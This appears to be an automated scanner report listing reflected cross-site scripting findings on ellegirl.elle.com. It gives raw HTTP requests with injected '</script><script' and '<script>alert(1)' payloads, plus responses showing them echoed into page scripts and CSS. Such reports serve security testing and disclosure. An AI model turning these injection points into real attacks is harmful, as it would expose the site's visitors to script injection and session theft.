HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:39:10 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30530 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:39:13 GMT Date: Sat, 17 Sep 2011 16:39:13 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... '; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT ALTER ANYTHI ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-contentfdcf3</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:33:23 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30631 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:33:27 GMT Date: Sat, 17 Sep 2011 16:33:27 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... 2 = ''; //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-contentfdcf3</script><script //s.evar ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins1bc38</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:35:06 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30632 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:35:11 GMT Date: Sat, 17 Sep 2011 16:35:11 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins1bc38</script><script //s.evar3 = ''; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:36:46 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30632 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:36:48 GMT Date: Sat, 17 Sep 2011 16:36:48 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins //s.evar3 = ''; s.evar3 = document. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:38:21 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30632 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:38:25 GMT Date: Sat, 17 Sep 2011 16:38:25 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... 3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins //s.evar3 = ''; s.evar3 = document.titl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:39:32 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30631 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:39:34 GMT Date: Sat, 17 Sep 2011 16:39:34 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... le; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins //s.evar3 = ''; s.evar3 = document.title; s.evar4 = '' ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Vary: Accept-Encoding Content-Length: 2468 Content-Type: text/css Date: Sat, 17 Sep 2011 16:32:28 GMT Connection: close #slideshow { list-style:none; color:#fff; } #slideshow span { display:none; } #slideshow-wrapper { width:294px; background:#00000096953<script>alert(1)< #slideshow-wrapper * { margin:0; padding:0; } #fullsize { position:relative; z-index:1; overflow:hidden; width:294px; he ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Vary: Accept-Encoding Content-Length: 2345 Content-Type: text/css Date: Sat, 17 Sep 2011 16:32:27 GMT Connection: close #slideshow { list-style:none; color:#fff; } #slideshow span { display:none; } #slideshow-wrapper { width:294px; background:#000000; padding:2px; border:4px solid #00000054d3b<script>alert(1)< #slideshow-wrapper * { margin:0; padding:0; } #fullsize { position:relative; z-index:1; overflow:hidden; width:294px; height:375px; } #information { positio ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Vary: Accept-Encoding Content-Length: 2345 Content-Type: text/css Date: Sat, 17 Sep 2011 16:32:25 GMT Connection: close #slideshow { list-style:none; color:#fff; } #slideshow span { display:none; } #slideshow-wrapper { width:294px; background:#000000; pad ...[SNIP]... g:2px; border:4px solid #000000; margin:25px auto; display:none; } #slideshow-wrapper * { margin:0; padding:0; } #fullsize { position:relative; z-index:1; overflow:hidden; width:294px; height:375cd1a4<script>alert(1)< #information { position:absolute; bottom:0; width:294px; height:0; background:#000000; color:#FFFFFF; overflow:hidden; z-index:200; opacity:.7; filter:alpha(opacity=70); } #information h3 { ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Vary: Accept-Encoding Content-Length: 2345 Content-Type: text/css Date: Sat, 17 Sep 2011 16:32:30 GMT Connection: close #slideshow { list-style:none; color:#fff; } #slideshow span { display:none; } #slideshow-wrapper { width:294px; background:#000000; pad ...[SNIP]... argin:0; padding:0; } #fullsize { position:relative; z-index:1; overflow:hidden; width:294px; height:375px; } #information { position:absolute; bottom:0; width:294px; height:0; background:#000000b9914<script>alert(1)< #information h3 { color:#FFFFFF; padding:4px 8px 3px; font-size:14px; } #information p { color:#FFFFFF; padd ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Vary: Accept-Encoding Content-Length: 2427 Content-Type: text/css Date: Sat, 17 Sep 2011 16:32:31 GMT Connection: close #slideshow { list-style:none; color:#fff; } #slideshow span { display:none; } #slideshow-wrapper { width:294px; background:#000000; pad ...[SNIP]... g:0; } #fullsize { position:relative; z-index:1; overflow:hidden; width:294px; height:375px; } #information { position:absolute; bottom:0; width:294px; height:0; background:#000000; color:#FFFFFF5d2d4<script>alert(1)< #information h3 { color:#FFFFFF5d2d4<script ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content2a4a3</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:33:03 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30493 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:33:08 GMT Date: Sat, 17 Sep 2011 16:33:08 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... 2 = ''; //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content2a4a3</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.h ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins110e9</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:34:41 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30493 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:34:46 GMT Date: Sat, 17 Sep 2011 16:34:46 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins110e9</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:36:18 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30493 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:36:22 GMT Date: Sat, 17 Sep 2011 16:36:22 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NO ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:37:45 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30493 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:37:49 GMT Date: Sat, 17 Sep 2011 16:37:49 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... p3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT A ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:39:08 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30493 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:39:11 GMT Date: Sat, 17 Sep 2011 16:39:11 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... nt.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT ALTER ANYTHI ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins/wp |
GET /wp-content16c4f</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:32:48 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30489 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:32:53 GMT Date: Sat, 17 Sep 2011 16:32:53 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... 2 = ''; //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content16c4f</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins5cef8</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:34:29 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30489 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:34:32 GMT Date: Sat, 17 Sep 2011 16:34:32 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins5cef8</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /*** ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins/wp Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:36:00 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30489 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:36:04 GMT Date: Sat, 17 Sep 2011 16:36:04 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins/wp //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* D ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins/wp Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:37:38 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30489 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:37:41 GMT Date: Sat, 17 Sep 2011 16:37:41 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... ocument.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins/wp //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /************* DO NOT ALTER ANYTH ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/themes/thesis |
GET /wp-content11f59</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
